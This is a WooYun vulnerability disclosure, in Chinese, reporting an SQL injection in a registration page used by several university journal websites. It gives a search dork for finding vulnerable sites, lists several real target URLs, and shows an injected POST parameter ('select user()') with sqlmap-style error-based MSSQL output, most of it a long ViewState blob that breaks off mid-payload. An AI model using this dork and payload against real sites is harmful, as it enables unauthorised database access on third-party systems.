当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104849

漏洞标题:某高校在用系统一处sql注入

相关厂商:cncert

漏洞作者: 路人甲

提交时间:2015-04-01 10:37

修复时间:2015-07-02 18:36

公开时间:2015-07-02 18:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-01: 细节已通知厂商并且等待厂商处理中
2015-04-03: 厂商已经确认,细节仅向厂商公开
2015-04-06: 细节向第三方安全合作伙伴开放
2015-05-28: 细节向核心白帽子及相关领域专家公开
2015-06-07: 细节向普通白帽子公开
2015-06-17: 细节向实习白帽子公开
2015-07-02: 细节向公众公开

简要描述:

某高校在用系统一处sql注入

详细说明:

百度关键词:inurl:/Docs/Commentlist.aspx?ItemID=
去掉路径 加上/register.aspx
案例:

http://shandixb.paperopen.com//register.aspx
http://ndxbskb.imu.edu.cn//register.aspx
http://www.zhsyeklczz.com//register.aspx
http://www.cqnuj.cn//register.aspx
......


漏洞证明:

POST下参数ctl00%24cphContect%24txtName存在注入

__VIEWSTATE=%2FwEPDwUJNzI4MDM2NzIxDxYCHgtSZWZlcnJlclVybAUwaHR0cDovL25keGJza2IuaW11LmVkdS5jbi9Mb2dpbi5hc3B4P1JvbGU9YXV0aG9yFgJmD2QWAgIBD2QWCAIBD2QWBGYPZBYCZg8WAh4EVGV4dAXyASA8ZW1iZWQgcGx1Z2luc3BhZ2U9Imh0dHA6Ly93d3cubWFjcm9tZWRpYS5jb20vc2hvY2t3YXZlL2Rvd25sb2FkL2luZGV4LmNnaT9QMV9Qcm9kX1ZlcnNpb249U2hvY2t3YXZlRmxhc2giIHNyYz0iL0ltYWdlcy90b3Auc3dmIiB3aWR0aD0iOTkwIiBoZWlnaHQ9IjE4MCIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHF1YWxpdHk9ImhpZ2giIHdtb2RlPSJvcGFxdWUiIHNjYWxlPSJleGFjdGZpdCIgLz4gZAIBD2QWAmYPFgIfAQXuBzx1bD48bGk%2BPGEgaHJlZj0iLyI%2B6aaWIOmhtTwvYT48L2xpPjxsaSBvbm1vdXNlb3Zlcj0ic2hvd1N1Yk1lbnUodGhpcykiIG9ubW91c2VvdXQ9ImhpZGVTdWJNZW51KHRoaXMpIj48YSBocmVmPSIvQ29ycC8xMC5hc3B4Ij7nvJblp5TnroDku4s8L2E%2BIDx1bD48bGk%2BPGEgaHJlZj0iL0NvcnAvMTAuYXNweCI%2B5a2m5oql5LuL57uNPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9Db3JwLzIwLmFzcHgiPue8luWnlOeugOS7izwvYT48L2xpPjwvdWw%2BPC9saT48bGkgb25tb3VzZW92ZXI9InNob3dTdWJNZW51KHRoaXMpIiBvbm1vdXNlb3V0PSJoaWRlU3ViTWVudSh0aGlzKSI%2BPGEgaHJlZj0iL29hLyI%2B5paH56ug5p%2Bl6K%2BiPC9hPiA8dWw%2BPGxpPjxhIGhyZWY9Ii9PQS9PQU1MLmFzcHgiPuacgOaWsOS4gOacnzwvYT48L2xpPjxsaT48YSBocmVmPSIvb2EvIj7mlofnq6Dmn6Xor6I8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL29hL2RsaXN0bnVtLmFzcHgiPuaWh%2BeroOaAu%2BebrjwvYT48L2xpPjxsaT48YSBocmVmPSIvb2EvZGVmaW5kZXhudW0uYXNweD9pZD0xIj7kuIvovb3mjpLlkI08L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL29hL2RlZmluZGV4bnVtLmFzcHgiPua1j%2BiniOaOkuWQjTwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iL2RvY3MvcWtkdC9kZWZhdWx0LmFzcHgiPuacn%2BWIiuWKqOaAgTwvYT4gPC9saT48bGk%2BPGEgaHJlZj0iL0NvcnAvNjAuYXNweCI%2B5pys5YiK566A5LuLPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9Db3JwLzEzMDAuYXNweCI%2B5oqV56i%2F6aG755%2BlPC9hPjwvbGk%2BPGxpIG9ubW91c2VvdmVyPSJzaG93U3ViTWVudSh0aGlzKSIgb25tb3VzZW91dD0iaGlkZVN1Yk1lbnUodGhpcykiPjxhIGhyZWY9Ii9Db3JwLzMwLmFzcHgiPue9keS4iuiuoumYhTwvYT4gPC9saT48bGk%2BPGEgaHJlZj0iL0NvcnAvMTQwMC5hc3B4Ij7lub%2FlkYrlkIjkvZw8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0NvcnAvNTAuYXNweCI%2B6IGU57O75oiR5LusPC9hPjwvbGk%2BPC91bD5kAgMPZBYEZg9kFgQCCQ9kFggCAQ9kFgICAQ9kFgICBQ8PFgIeB1Zpc2libGVnZGQCAw9kFgICAQ9kFgICBQ8PFgIfAmdkZAIFD2QWAgIBD2QWAgIDDw8WAh8CZ2RkAgcPZBYCAgEPZBYCAgUPDxYCHwJnZGQCCw9kFhoCAw9kFgICAQ9kFgICAQ8QZGQUKwEAZAIFD2QWAgIBD2QWAgIBDxBkZBYBZmQCBw9kFgICAQ9kFgICAQ8QDxYCHgtfIURhdGFCb3VuZGdkEBU4BuaxieaXjwblo67ml48G5ruh5pePBuWbnuaXjwboi5fml48M57u05ZC%2B5bCU5pePCeWcn%2BWutuaXjwblvZ3ml48J6JKZ5Y%2Bk5pePBuiXj%2BaXjwnluIPkvp3ml48G5L6X5pePBueRtuaXjwnmnJ3pspzml48G55m95pePCeWTiOWwvOaXjwzlk4jokKjlhYvml48G6buO5pePBuWCo%2BaXjwbnlbLml48J5YOz5YOz5pePCeS7oeS9rOaXjwnkuJzkuaHml48J5ouJ56Wc5pePBuawtOaXjwbkvaTml48J57qz6KW%2F5pePBue%2BjOaXjwblnJ%2Fml48J5Lur5L2s5pePCemUoeS8r%2BaXjw%2Fmn6%2FlsJTlhYvlrZzml48M6L6%2B5pah5bCU5pePCeaZr%2Bmih%2BaXjwnmr5vljZfml48J5pKS5ouJ5pePCeW4g%2Bacl%2BaXjwzloZTlkInlhYvml48J6Zi%2F5piM5pePCeaZruexs%2BaXjwzphILmuKnlhYvml48G5oCS5pePBuS6rOaXjwnln7ror7rml48J5b635piC5pePCeS%2FneWuieaXjwzkv4TnvZfmlq%2Fml48J6KOV5Zu65pePD%2BS5jOWtnOWIq%2BWFi%2BaXjwnpl6jlt7Tml48M6YSC5Lym5pil5pePCeeLrOm%2BmeaXjwzloZTloZTlsJTml48J6LWr5ZOy5pePCemrmOWxseaXjwnnj57lt7Tml48VOAExATIBMwE0ATUBNgE3ATgBOQIxMAIxMQIxMgIxMwIxNAIxNQIxNgIxNwIxOAIxOQIyMAIyMQIyMgIyMwIyNAIyNQIyNgIyNwIyOAIyOQIzMAIzMQIzMgIzMwIzNAIzNQIzNgIzNwIzOAIzOQI0MAI0MQI0MgI0MwI0NAI0NQI0NgI0NwI0OAI0OQI1MAI1MQI1MgI1MwI1NAI1NQI1NhQrAzhnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZxYAZAILD2QWAgIBD2QWAgIDDxAPFgYeDURhdGFUZXh0RmllbGQFCFByb3ZpbmNlHg5EYXRhVmFsdWVGaWVsZAUKUHJvdmljZV9JRB8DZ2QPFiMCAQICAgMCBAIFAgYCBwIIAgkCCgILAgwCDQIOAg8CEAIRAhICEwIUAhUCFgIXAhgCGQIaAhsCHAIdAh4CHwIgAiECIgIjFiMQBQbpmZXopb8FATRnEAUG5YyX5LqsBQExZxAFBuS4iua1twUBMmcQBQblpKnmtKUFATVnEAUG6YeN5bqGBQE2ZxAFBuWxseS4nAUBM2cQBQblkInmnpcFAjExZxAFBui%2BveWugQUCMTBnEAUJ6buR6b6Z5rGfBQIxMmcQBQbmsZ%2Foi48FAjEzZxAFBuWuieW%2BvQUCMTVnEAUG5rWZ5rGfBQIxNGcQBQbmsrPljJcFATdnEAUG5rKz5Y2XBQIxOGcQBQbmuZbljJcFAjE5ZxAFBua5luWNlwUCMjBnEAUG5bGx6KW%2FBQE4ZxAFBuWbm%2BW3nQUCMjRnEAUG5bm%2F5LicBQIyMWcQBQblub%2Fopb8FAjIyZxAFBuemj%2BW7ugUCMTZnEAUJ5YaF6JKZ5Y%2BkBQE5ZxAFBuaxn%2BilvwUCMTdnEAUG5rW35Y2XBQIyM2cQBQbotLXlt54FAjI1ZxAFBuS6keWNlwUCMjZnEAUG6KW%2F6JePBQIyN2cQBQbnlJjogoMFAjI4ZxAFBumdkua1twUCMjlnEAUG5a6B5aSPBQIzMGcQBQbmlrDnloYFAjMxZxAFBummmea4rwUCMzJnEAUG5Y%2Bw5rm%2BBQIzNWcQBQbmvrPpl6gFAjM0ZxAFBua1t%2BWklgUCMzNnFgFmZAITD2QWAgIBD2QWAgIDDxAPFgYfBAUISm9iX0tpbmQfBQULSm9iX0tpbmRfSUQfA2dkDxYFAgECAgIDAgQCBRYFEAUP5Zyo6K%2B756CU56m255SfBQIxMGcQBRLmlZnlrabnp5HnoJTkurrlkZgFAjIwZxAFEuW3peeoi%2BaKgOacr%2BS6uuWRmAUCNDBnEAUM566h55CG5Lq65ZGYBQI2MGcQBQblhbblroMFAjgxZxYBZmQCGQ9kFgICAQ9kFgICAw8QDxYGHwQFCVVuaXRfS2luZB8FBQxVbml0X0tpbmRfSUQfA2dkDxYEAgECAgIDAgQWBBAFDOmrmOetiemZouagoQUCMTBnEAUM56eR56CU6Zmi5omABQIyMGcQBQzkvIHkuJrljZXkvY0FAjMwZxAFDOWFtuS7luaAp%2Bi0qAUCNDBnFgFmZAIbDxYCHgVzdHlsZQUTYmFja2dyb3VuZDojZjVmNWY1OxYCAgEPZBYCAgUPDxYCHwJnZGQCHQ8WAh8GBRNiYWNrZ3JvdW5kOiNmNWY1ZjU7ZAIfDxYCHwYFE2JhY2tncm91bmQ6I2Y1ZjVmNTtkAikPFgIfAmcWAgIBD2QWAgIFDw8WAh8CZ2RkAi0PZBYCAgEPZBYCAgEPEA8WBh8EBQpQcm9mZmVzaW9uHwUFDFByb2Zlc3Npb25JRB8DZ2QQFQAVABQrAwAWAGQCLw8WAh8CZxYCAgEPZBYEAgMPEA8WBh8EBQZEZWdyZWUfBQUJRGVncmVlX0lEHwNnZA8WAwIBAgICAxYDEAUG5Y2a5aOrBQI0MGcQBQbnoZXlo6sFAjMwZxAFBuWFtuS7lgUCNDZnFgFmZAIFDw8WAh8CZ2RkAjsPZBYCAgEPZBYCAgMPEGRkFgFmZAIBD2QWAgIFDzwrAAsAZAIFD2QWDGYPZBYCAgEPFgIfAmcWAmYPZBYCZg8WAh8BBZMDIDx1bD48bGkgY2xhc3M9ImxvZ2ludmlldzAxIj48YSBjbGFzcz0ibG9naW53eiIgaHJlZj0iL0xvZ2luLmFzcHg%2FUm9sZT1hdXRob3IiPuWcqOe6v%2BaKleeov%2BafpeeovzwvYT48L2xpPjxsaSBjbGFzcz0ibG9naW52aWV3MDIiPjxhIGNsYXNzPSJsb2dpbnd6IiBocmVmPSIvTG9naW4uYXNweD9Sb2xlPWV4cGVydCI%2B5LiT5a625Zyo57q%2F5a6h56i%2FPC9hPjwvbGk%2BPGxpIGNsYXNzPSJsb2dpbnZpZXcwMyI%2BPGEgY2xhc3M9ImxvZ2lud3oiIGhyZWY9Ii9Mb2dpbi5hc3B4P1JvbGU9bWFuYWdlIj7nvJbovpHlnKjnur%2Flip7lhaw8L2E%2BPC9saT48bGkgY2xhc3M9ImxvZ2ludmlldzA0Ij48YSBjbGFzcz0ibG9naW53eiIgaHJlZj0iL1JlZ2lzdGVyLmFzcHgiPuWcqCDnur8g5rOoIOWGjCA8L2E%2BPC9saT48L3VsPmQCAQ9kFgRmDw8WAh4LTmF2aWdhdGVVcmwFTi4uL29hL29hc2NyaXB0aXNzdWVsc2l0LmFzcHg%2Fa2luZD11cGlzc3VlJmlzc3Vlbm9saXN0PTIwMDklZTUlYjklYjQwNSVlNiU5YyU5ZmRkAgEPDxYCHgdFbmFibGVkaGRkAgIPZBYEZg8WAh4LXyFJdGVtQ291bnQCChYUAgEPZBYCAgEPDxYGHwEFIjIwMTXlubTkuIrljYrlubTlop7liIrlvoHnqL%2FlkK%2FkuoseB1Rvb2xUaXAFIjIwMTXlubTkuIrljYrlubTlop7liIrlvoHnqL%2FlkK%2FkuosfBwVPfi9kb2NzL3FrZHQvZGV0YWlscy5hc3B4P2RvY3VtZW50aWQ9MzgmTmlkPUE0RkRGNjUzLTIxMkMtNDUzNC1BNEIyLUVDRjg2RTMwN0ZBN2RkAgIPZBYCAgEPDxYGHwEFIjIwMTTlubTkuIvljYrlubTlop7liIrlvoHnqL%2FlkK%2FkuosfCgUiMjAxNOW5tOS4i%2BWNiuW5tOWinuWIiuW%2Bgeeov%2BWQr%2BS6ix8HBU9%2BL2RvY3MvcWtkdC9kZXRhaWxzLmFzcHg%2FZG9jdW1lbnRpZD0zNyZOaWQ9RTM2QTUwMTMtRTVFQy00MDlELThGNTMtN0Q4QzEzMzc2Qjc0ZGQCAw9kFgICAQ8PFgYfAQUZMjAxNOW5tOaakeWBh%2BaUvuWBh%2BmAmuefpR8KBRkyMDE05bm05pqR5YGH5pS%2B5YGH6YCa55%2BlHwcFT34vZG9jcy9xa2R0L2RldGFpbHMuYXNweD9kb2N1bWVudGlkPTM2Jk5pZD1EOURGNDdFOC00Q0Y1LTRCMEYtQkM2NS00ODc4RTZGRjc3RERkZAIED2QWAgIBDw8WBh8BBSMyMDE0IOW5tOS4iuWNiuW5tOWinuWIiuW%2Bgeeov%2BWQr%2BS6ix8KBSMyMDE0IOW5tOS4iuWNiuW5tOWinuWIiuW%2Bgeeov%2BWQr%2BS6ix8HBU9%2BL2RvY3MvcWtkdC9kZXRhaWxzLmFzcHg%2FZG9jdW1lbnRpZD0zNSZOaWQ9NTU3MzFCNzktRTk4Qy00OUQzLUE2QkYtNkNGMDZDMURCNDI3ZGQCBQ9kFgICAQ8PFgYfAQUiMjAxM%2BW5tOS4i%2BWNiuW5tOWinuWIiuW%2Bgeeov%2BWQr%2BS6ix8KBSIyMDEz5bm05LiL5Y2K5bm05aKe5YiK5b6B56i%2F5ZCv5LqLHwcFT34vZG9jcy9xa2R0L2RldGFpbHMuYXNweD9kb2N1bWVudGlkPTM0Jk5pZD0yQ0U5NjFERi0wMjk2LTQ1Q0EtQUNBMC0yRjYyMDM3OTA2MDJkZAIGD2QWAgIBDw8WBh8BBQzlr5LlgYfpgJrnn6UfCgUM5a%2BS5YGH6YCa55%2BlHwcFT34vZG9jcy9xa2R0L2RldGFpbHMuYXNweD9kb2N1bWVudGlkPTMwJk5pZD1BRUE2RkVFNy1DNjc0LTQ1NzUtOEYzMS04NTI3NjUyQUZDNDVkZAIHD2QWAgIBDw8WBh8BBRjph4fnvJbns7vnu5%2FlvIDlp4vkvb%2FnlKgfCgUY6YeH57yW57O757uf5byA5aeL5L2%2F55SoHwcFT34vZG9jcy9xa2R0L2RldGFpbHMuYXNweD9kb2N1bWVudGlkPTI3Jk5pZD0zM0E5MkUzNi1FOTc3LTRGNTEtOTlERi02MkVFMTExRUNGQ0ZkZAIID2QWAgIBDw8WBh8BBRvmnJ%2FliIrliqjmgIHlvoXnu7TmiqTkuK0uLi4fCgUb5pyf5YiK5Yqo5oCB5b6F57u05oqk5LitLi4uHwcFT34vZG9jcy9xa2R0L2RldGFpbHMuYXNweD9kb2N1bWVudGlkPTE2Jk5pZD03M0YzRUE0Qy1BMkQ1LTQxQ0MtQTY0MC1DRERGQTMzM0Q1MUZkZAIJD2QWAgIBDw8WBh8BBRvmnJ%2FliIrliqjmgIHlvoXnu7TmiqTkuK0uLi4fCgUb5pyf5YiK5Yqo5oCB5b6F57u05oqk5LitLi4uHwcFT34vZG9jcy9xa2R0L2RldGFpbHMuYXNweD9kb2N1bWVudGlkPTE1Jk5pZD03MTU2NjREMS05MUQwLTQ3OUItQkUxNy0zN0I2QTYwN0NGRjFkZAIKD2QWAgIBDw8WBh8BBRvmnJ%2FliIrliqjmgIHlvoXnu7TmiqTkuK0uLi4fCgUb5pyf5YiK5Yqo5oCB5b6F57u05oqk5LitLi4uHwcFT34vZG9jcy9xa2R0L2RldGFpbHMuYXNweD9kb2N1bWVudGlkPTE0Jk5pZD0yMEMxMTdGMS05NDI2LTQ5MzEtOTJDMy03QTUwNUQwODlEOTVkZAICDxYCHwJoZAIDD2QWBGYPFgIfCQIDFgYCAQ9kFgICAQ8PFgYfAQUb5L2c6ICF5Zut5Zyw5b6F57u05oqk5LitLi4uHwoFG%2BS9nOiAheWbreWcsOW%2Bhee7tOaKpOS4rS4uLh8HBU5%2BL2RvY3Mvenp5ZC9kZXRhaWxzLmFzcHg%2FZG9jdW1lbnRpZD02Jk5pZD1FNEZEMDUzNS1CMTlDLTQxRjQtQjYzMi00QTA5OUVDQjUyMzlkZAICD2QWAgIBDw8WBh8BBRvkvZzogIXlm63lnLDlvoXnu7TmiqTkuK0uLi4fCgUb5L2c6ICF5Zut5Zyw5b6F57u05oqk5LitLi4uHwcFTn4vZG9jcy96enlkL2RldGFpbHMuYXNweD9kb2N1bWVudGlkPTUmTmlkPTI3QTg5MjgyLUY5RTAtNEZENy1BMjNDLTU5NzA2MzU4QzY1M2RkAgMPZBYCAgEPDxYGHwEFG%2BS9nOiAheWbreWcsOW%2Bhee7tOaKpOS4rS4uLh8KBRvkvZzogIXlm63lnLDlvoXnu7TmiqTkuK0uLi4fBwVOfi9kb2NzL3p6eWQvZGV0YWlscy5hc3B4P2RvY3VtZW50aWQ9NCZOaWQ9REZDNDYwREEtQjI5Qi00QkM4LTlDOUEtRkRBNkJBMTRFNzIyZGQCAg8WAh8CaGQCBQ9kFgZmDxYCHwkCAxYGAgEPZBYCAgEPDxYCHwEFuAE8YSAgcmVsPSdleHRlcm5hbCcgIHRhcmdldD0iX2JsYW5rIiBocmVmPScvQWRzQ2xpY2suYXNweD9BZHNJZD01JyA%2BPGltZyBhbHQ9Jycgc3R5bGU9J2hlaWdodDogNTVweDsgd2lkdGg6IDE5MHB4JyBzcmM9Jy9VcGxvYWQvQWRJbWFnZXMvMGM5MDRiZjctZjcyYy00Yjg2LWE2MDktZDBkNGEwOWE1MWIxLmpwZycgLz48L2E%2BZGQCAg9kFgICAQ8PFgIfAQW4ATxhICByZWw9J2V4dGVybmFsJyAgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9Jy9BZHNDbGljay5hc3B4P0Fkc0lkPTYnID48aW1nIGFsdD0nJyBzdHlsZT0naGVpZ2h0OiA1NXB4OyB3aWR0aDogMTkwcHgnIHNyYz0nL1VwbG9hZC9BZEltYWdlcy80MWQ5MjFiMS00YWY3LTRiYzctOWM2Mi0zNzg2Y2UxMjg2NzguanBnJyAvPjwvYT5kZAIDD2QWAgIBDw8WAh8BBbgBPGEgIHJlbD0nZXh0ZXJuYWwnICB0YXJnZXQ9Il9ibGFuayIgaHJlZj0nL0Fkc0NsaWNrLmFzcHg%2FQWRzSWQ9NycgPjxpbWcgYWx0PScnIHN0eWxlPSdoZWlnaHQ6IDU1cHg7IHdpZHRoOiAxOTBweCcgc3JjPScvVXBsb2FkL0FkSW1hZ2VzL2M0OGU0MjA0LTcyY2MtNDA1OS1hOGUxLTkyYzY4YTBiZjdiOS5qcGcnIC8%2BPC9hPmRkAgIPFgIfCQICFgQCAQ9kFgJmDxUCATEM57yW6L6R5LmL5a62ZAICD2QWAmYPFQIBMgznn6XlhYjkv6Hmga9kAgQPEA8WAh8CaGRkFgBkAgYPZBYCZg8WAh4JaW5uZXJodG1sBT88cD7lvZPliY3lnKjnur%2FkurrmlbDvvJo2PC9wPjxQPuaAu%2Biuv%2BmXrumHj%2Be7n%2Biuoe%2B8mjIwODk4NDwvcD5kAgcPZBYCAgEPDxYCHwEFhAI8c3Ryb25nPkNvcHlyaWdodCAyMDA5Q2hpbmEgQWxsIFJpZ2h0cyBSZXNlcnZlZCA8YnIgLz7jgIrlhoXokpnlj6TlpKflrablrabmiqXjgIvvvIjlk7LlrabnpL7kvJrnp5HlrabniYjvvInniYjmnYM8YnIgLz48L3N0cm9uZz48YSBocmVmPSJtYWlsdG86bmR4YnJ3c2tAaW11LmVkdS5jbiI%2BPHNwYW4gc3R5bGU9IkNPTE9SOiAjMzMzMzMzIj48c3Ryb25nPm5keGJyd3NrQGltdS5lZHUuY248L3N0cm9uZz48L3NwYW4%2BPC9hPjxzdHJvbmc%2BIDwvc3Ryb25nPmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBRhjdGwwMCRjcGhDb250ZWN0JGNiQWdyZWXHv4qkisgdu887c9TGFESMw6%2Bm0g%3D%3D&__VIEWSTATEGENERATOR=799CC77D&ctl00%24cphContect%24txtName=%27 select user()( --&ctl00%24cphContect%24cbAgree=on&ctl00%24cphContect%24btnQuery=%2B%CF%C2%D2%BB%B2%BD%2B


Place: POST
Parameter: ctl00$cphContect$txtName
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUJNzI4MDM2NzIxDxYCHgtSZWZlcnJlclVybAUwaHR0cDovL25
keGJza2IuaW11LmVkdS5jbi9Mb2dpbi5hc3B4P1JvbGU9YXV0aG9yFgJmD2QWAgIBD2QWCAIBD2QWBGY
PZBYCZg8WAh4EVGV4dAXyASA8ZW1iZWQgcGx1Z2luc3BhZ2U9Imh0dHA6Ly93d3cubWFjcm9tZWRpYS5
jb20vc2hvY2t3YXZlL2Rvd25sb2FkL2luZGV4LmNnaT9QMV9Qcm9kX1ZlcnNpb249U2hvY2t3YXZlRmx
hc2giIHNyYz0iL0ltYWdlcy90b3Auc3dmIiB3aWR0aD0iOTkwIiBoZWlnaHQ9IjE4MCIgdHlwZT0iYXB
wbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHF1YWxpdHk9ImhpZ2giIHdtb2RlPSJvcGFxdWUiIHN
jYWxlPSJleGFjdGZpdCIgLz4gZAIBD2QWAmYPFgIfAQXuBzx1bD48bGk+PGEgaHJlZj0iLyI+6aaWIOm
htTwvYT48L2xpPjxsaSBvbm1vdXNlb3Zlcj0ic2hvd1N1Yk1lbnUodGhpcykiIG9ubW91c2VvdXQ9Imh
pZGVTdWJNZW51KHRoaXMpIj48YSBocmVmPSIvQ29ycC8xMC5hc3B4Ij7nvJblp5TnroDku4s8L2E+IDx
1bD48bGk+PGEgaHJlZj0iL0NvcnAvMTAuYXNweCI+5a2m5oql5LuL57uNPC9hPjwvbGk+PGxpPjxhIGh
yZWY9Ii9Db3JwLzIwLmFzcHgiPue8luWnlOeugOS7izwvYT48L2xpPjwvdWw+PC9saT48bGkgb25tb3V
zZW92ZXI9InNob3dTdWJNZW51KHRoaXMpIiBvbm1vdXNlb3V0PSJoaWRlU3ViTWVudSh0aGlzKSI+PGE
gaHJlZj0iL29hLyI+5paH56ug5p+l6K+iPC9hPiA8dWw+PGxpPjxhIGhyZWY9Ii9PQS9PQU1MLmFzcHg
iPuacgOaWsOS4gOacnzwvYT48L2xpPjxsaT48YSBocmVmPSIvb2EvIj7mlofnq6Dmn6Xor6I8L2E+PC9
saT48bGk+PGEgaHJlZj0iL29hL2RsaXN0bnVtLmFzcHgiPuaWh+eroOaAu+ebrjwvYT48L2xpPjxsaT4
8YSBocmVmPSIvb2EvZGVmaW5kZXhudW0uYXNweD9pZD0xIj7kuIvovb3mjpLlkI08L2E+PC9saT48bGk
+PGEgaHJlZj0iL29hL2RlZmluZGV4bnVtLmFzcHgiPua1j+iniOaOkuWQjTwvYT48L2xpPjwvdWw+PC9
saT48bGk+PGEgaHJlZj0iL2RvY3MvcWtkdC9kZWZhdWx0LmFzcHgiPuacn+WIiuWKqOaAgTwvYT4gPC9
saT48bGk+PGEgaHJlZj0iL0NvcnAvNjAuYXNweCI+5pys5YiK566A5LuLPC9hPjwvbGk+PGxpPjxhIGh
yZWY9Ii9Db3JwLzEzMDAuYXNweCI+5oqV56i/6aG755+lPC9hPjwvbGk+PGxpIG9ubW91c2VvdmVyPSJ
zaG93U3ViTWVudSh0aGlzKSIgb25tb3VzZW91dD0iaGlkZVN1Yk1lbnUodGhpcykiPjxhIGhyZWY9Ii9
Db3JwLzMwLmFzcHgiPue9keS4iuiuoumYhTwvYT4gPC9saT48bGk+PGEgaHJlZj0iL0NvcnAvMTQwMC5
hc3B4Ij7lub/lkYrlkIjkvZw8L2E+PC9saT48bGk+PGEgaHJlZj0iL0NvcnAvNTAuYXNweCI+6IGU57O
75oiR5LusPC9hPjwvbGk+PC91bD5kAgMPZBYEZg9kFgQCCQ9kFggCAQ9kFgICAQ9kFgICBQ8PFgIeB1Z
pc2libGVnZGQCAw9kFgICAQ9kFgICBQ8PFgIfAmdkZAIFD2QWAgIBD2QWAgIDDw8WAh8CZ2RkAgcPZBY
CAgEPZBYCAgUPDxYCHwJnZGQCCw9kFhoCAw9kFgICAQ9kFgICAQ8QZGQUKwEAZAIFD2QWAgIBD2QWAgI
BDxBkZBYBZmQCBw9kFgICAQ9kFgICAQ8QDxYCHgtfIURhdGFCb3VuZGdkEBU4BuaxieaXjwblo67ml48
G5ruh5pePBuWbnuaXjwboi5fml48M57u05ZC+5bCU5pePCeWcn+WutuaXjwblvZ3ml48J6JKZ5Y+k5pe
PBuiXj+aXjwnluIPkvp3ml48G5L6X5pePBueRtuaXjwnmnJ3pspzml48G55m95pePCeWTiOWwvOaXjwz
lk4jokKjlhYvml48G6buO5pePBuWCo+aXjwbnlbLml48J5YOz5YOz5pePCeS7oeS9rOaXjwnkuJzkuaH
ml48J5ouJ56Wc5pePBuawtOaXjwbkvaTml48J57qz6KW/5pePBue+jOaXjwblnJ/ml48J5Lur5L2s5pe
PCemUoeS8r+aXjw/mn6/lsJTlhYvlrZzml48M6L6+5pah5bCU5pePCeaZr+mih+aXjwnmr5vljZfml48
J5pKS5ouJ5pePCeW4g+acl+aXjwzloZTlkInlhYvml48J6Zi/5piM5pePCeaZruexs+aXjwzphILmuKn
lhYvml48G5oCS5pePBuS6rOaXjwnln7ror7rml48J5b635piC5pePCeS/neWuieaXjwzkv4TnvZfmlq/
ml48J6KOV5Zu65pePD+S5jOWtnOWIq+WFi+aXjwnpl6jlt7Tml48M6YSC5Lym5pil5pePCeeLrOm+mea
XjwzloZTloZTlsJTml48J6LWr5ZOy5pePCemrmOWxseaXjwnnj57lt7Tml48VOAExATIBMwE0ATUBNgE
3ATgBOQIxMAIxMQIxMgIxMwIxNAIxNQIxNgIxNwIxOAIxOQIyMAIyMQIyMgIyMwIyNAIyNQIyNgIyNwI
yOAIyOQIzMAIzMQIzMgIzMwIzNAIzNQIzNgIzNwIzOAIzOQI0MAI0MQI0MgI0MwI0NAI0NQI0NgI0NwI
0OAI0OQI1MAI1MQI1MgI1MwI1NAI1NQI1NhQrAzhnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2d
nZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZxYAZAILD2QWAgIBD2QWAgIDDxAPFgYeDURhdGFUZXh0Rml
lbGQFCFByb3ZpbmNlHg5EYXRhVmFsdWVGaWVsZAUKUHJvdmljZV9JRB8DZ2QPFiMCAQICAgMCBAIFAgY
CBwIIAgkCCgILAgwCDQIOAg8CEAIRAhICEwIUAhUCFgIXAhgCGQIaAhsCHAIdAh4CHwIgAiECIgIjFiM
QBQbpmZXopb8FATRnEAUG5YyX5LqsBQExZxAFBuS4iua1twUBMmcQBQblpKnmtKUFATVnEAUG6YeN5bq
GBQE2ZxAFBuWxseS4nAUBM2cQBQblkInmnpcFAjExZxAFBui+veWugQUCMTBnEAUJ6buR6b6Z5rGfBQI
xMmcQBQbmsZ/oi48FAjEzZxAFBuWuieW+vQUCMTVnEAUG5rWZ5rGfBQIxNGcQBQbmsrPljJcFATdnEAU
G5rKz5Y2XBQIxOGcQBQbmuZbljJcFAjE5ZxAFBua5luWNlwUCMjBnEAUG5bGx6KW/BQE4ZxAFBuWbm+W
3nQUCMjRnEAUG5bm/5LicBQIyMWcQBQblub/opb8FAjIyZxAFBuemj+W7ugUCMTZnEAUJ5YaF6JKZ5Y+
kBQE5ZxAFBuaxn+ilvwUCMTdnEAUG5rW35Y2XBQIyM2cQBQbotLXlt54FAjI1ZxAFBuS6keWNlwUCMjZ
nEAUG6KW/6JePBQIyN2cQBQbnlJjogoMFAjI4ZxAFBumdkua1twUCMjlnEAUG5a6B5aSPBQIzMGcQBQb
mlrDnloYFAjMxZxAFBummmea4rwUCMzJnEAUG5Y+w5rm+BQIzNWcQBQbmvrPpl6gFAjM0ZxAFBua1t+W
klgUCMzNnFgFmZAITD2QWAgIBD2QWAgIDDxAPFgYfBAUISm9iX0tpbmQfBQULSm9iX0tpbmRfSUQfA2d
kDxYFAgECAgIDAgQCBRYFEAUP5Zyo6K+756CU56m255SfBQIxMGcQBRLmlZnlrabnp5HnoJTkurrlkZg
FAjIwZxAFEuW3peeoi+aKgOacr+S6uuWRmAUCNDBnEAUM566h55CG5Lq65ZGYBQI2MGcQBQblhbblroM
FAjgxZxYBZmQCGQ9kFgICAQ9kFgICAw8QDxYGHwQFCVVuaXRfS2luZB8FBQxVbml0X0tpbmRfSUQfA2d
